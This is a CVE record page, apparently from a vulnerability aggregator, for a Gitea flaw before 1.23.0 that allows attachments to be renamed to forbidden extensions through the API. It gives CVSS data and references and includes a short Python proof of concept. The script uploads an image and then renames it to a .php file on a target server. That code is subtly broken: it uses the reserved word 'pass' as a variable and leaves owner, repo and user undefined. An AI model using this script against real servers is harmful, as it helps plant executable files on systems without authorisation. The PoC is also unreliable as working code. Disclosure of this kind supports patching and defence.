CVE-2025-68939

Description

Gitea before 1.23.0 allows attackers to add attachments with forbidden file extensions by editing an attachment name via an attachment API.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:* - VULNERABLE

Gitea < 1.23.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2025-68939
# Upload a benign file then rename it to malicious extension

url = "http://target-gitea.com"
upload_url = f"{url}/api/v1/repos/{owner}/{repo}/attachments"

# Step 1: Upload legitimate file
files = {'file': ('test.jpg', b'fake image', 'image/jpeg')}
response = requests.post(upload_url, files=files, auth=(user, pass))
attachment_id = response.json()[0]['id']

# Step 2: Rename to malicious extension
rename_url = f"{url}/api/v1/repos/{owner}/{repo}/attachments/{attachment_id}"
requests.patch(rename_url, json={'name': 'test.php'}, auth=(user, pass))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68939
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68939
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68939/
[4] VulDB https://vuldb.com/cve/CVE-2025-68939
[5] https://blog.gitea.com/release-of-1.23.0/
[6] https://github.com/go-gitea/gitea/pull/32151
[7] https://github.com/go-gitea/gitea/releases/tag/v1.23.0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68939", "sourceIdentifier": "[email protected]", "published": "2025-12-26T03:15:50.653", "lastModified": "2026-01-02T19:35:04.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gitea before 1.23.0 allows attackers to add attachments with forbidden file extensions by editing an attachment name via an attachment API."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-424"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.23.0", "matchCriteriaId": "6477BDC2-3013-450E-8A00-4AC462B1A1BD"}]}]}], "references": [{"url": "https://blog.gitea.com/release-of-1.23.0/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/pull/32151", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/releases/tag/v1.23.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}